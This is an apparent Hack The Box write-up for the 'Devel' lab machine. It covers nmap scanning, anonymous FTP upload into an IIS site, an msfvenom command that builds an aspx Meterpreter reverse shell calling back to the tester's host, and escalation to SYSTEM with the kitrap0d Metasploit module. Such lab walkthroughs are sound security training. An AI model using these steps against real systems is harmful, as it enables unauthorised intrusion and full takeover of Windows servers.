HTB - Devel Writeup

Featured image

Initial Enumeration

Nmap Scanning

Let’s start with a scan of the target ip address:

nmap -sC -A -oN devel.nmap 10.10.10.5

The Nmap scan reveals Microsoft FTP port 21 and Microsoft IIS 7.5 port 80 open.

Website Enumeration

After opening Firefox and visit the website http://10.10.10.5 we get the default IIS 7 webpage.

Dirbuster enumeration provides us no further insight so we move our eyes over to the open FTP port.

FTP Enumeration

From our Nmap scan, we can see 2 files under the FTP.

Exploitation

Connecting anonymously via FTP reveals that it does allow anonymous logins. This misconfiguration is common.

Since our user can upload files, we can simply create a aspx reverse shell and execute it by browsing to the file via the web server.

Payload Generating/Delivery

The following command will create a aspx file that we will use:

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.28 LPORT=4444

Set up a listener in Metasploit and open the file in the web browser:

After trying to navigate through some directories we quickly realize we need escalated permissions.

Privilege

Put the session in the background:

background

Then use the following command to suggest local meterpreter exploits that can be used.

After testing the first local exploit exploit/windows/local/bypassuac_eventvwr, we see that it fails due to the IIS user not being a part of the administrators group. (This is usually default and to be expected)

The next exploit we test is:

exploit/windows/local/ms10_015_kitrap0d

This will attempt to create a new session with SYSTEM privileges.

Now that we have the exploit worked, we have SYSTEM access, let’s look for the root and user flags.

The root flag is on the Administrators desktop:

The user flag is on the “babis” user’s desktop: